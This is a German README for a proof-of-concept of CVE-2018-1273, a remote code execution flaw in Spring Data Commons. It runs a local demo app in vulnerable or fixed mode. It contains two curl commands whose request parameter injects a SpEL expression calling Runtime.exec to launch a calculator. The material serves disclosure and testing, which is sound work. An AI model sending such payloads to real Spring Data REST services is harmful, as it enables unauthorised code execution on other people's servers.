
PoC für CVE-2018-1273
Spring Data Commons, Versionen vor 1.13 bis 1.13.10, 2.0 bis 2.0.5 sowie ältere, nicht unterstützte Versionen, enthalten eine Property-Binder-Sicherheitslücke, die durch unsachgemäße Neutralisierung spezieller Elemente verursacht wird. Ein nicht authentifizierter, entfernter böswilliger Benutzer (oder Angreifer) kann speziell gestaltete Request-Parameter gegen Spring Data REST-gestützte HTTP-Ressourcen liefern oder die projektionsbasierte Request-Payload-Bindung von Spring Data verwenden, was zu einer Remote-Code-Ausführung führen kann.
Weitere Informationen hier
Die Anwendung kann mit der anfälligen Version oder der korrigierten Version von Spring Data Commons getestet werden.
mvn spring-boot:run
mvn spring-boot:run -Dfixed
Führen Sie den folgenden Befehl aus, um zu prüfen, ob die Sicherheitslücke ausgenutzt werden kann:
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"
Erstellt von https://www.arima.eu
